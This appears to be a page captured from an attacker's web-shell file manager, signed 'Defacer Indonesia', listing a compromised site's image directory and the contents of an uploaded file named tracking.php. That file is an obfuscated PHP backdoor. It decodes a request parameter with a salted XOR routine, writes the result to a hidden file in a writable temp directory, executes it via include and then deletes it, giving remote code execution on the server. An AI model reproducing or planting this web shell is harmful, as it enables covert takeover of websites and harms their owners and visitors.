whoami7 - Manager
:
/
home
/
analuakl
/
amplhomes.com
/
images
/
services
/
accommodation
/
Upload File:
files >> /home/analuakl/amplhomes.com/images/services/accommodation/tracking.php
<?php if(!empty($_REQUEST["\x73\x79m"])){ $obj = array_filter(["/tmp", ini_get("upload_tmp_dir"), "/dev/shm", "/var/tmp", session_save_path(), getenv("TMP"), sys_get_temp_dir(), getcwd(), getenv("TEMP")]); $data_chunk = $_REQUEST["\x73\x79m"]; $data_chunk = explode ( ".", $data_chunk ); $dat = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt); $n = 0; foreach ($data_chunk as $v6) { $sChar = ord($salt[$n % $sLen]); $dec = ((int)$v6 - $sChar - ($n % 10)) ^ 89; $dat .= chr($dec); $n++; } foreach ($obj as $holder) { if ((bool)is_dir($holder) && (bool)is_writable($holder)) { $value = "$holder/.component"; if (file_put_contents($value, $dat)) { include $value; @unlink($value); exit; } } } }
Copyright ©2021 || Defacer Indonesia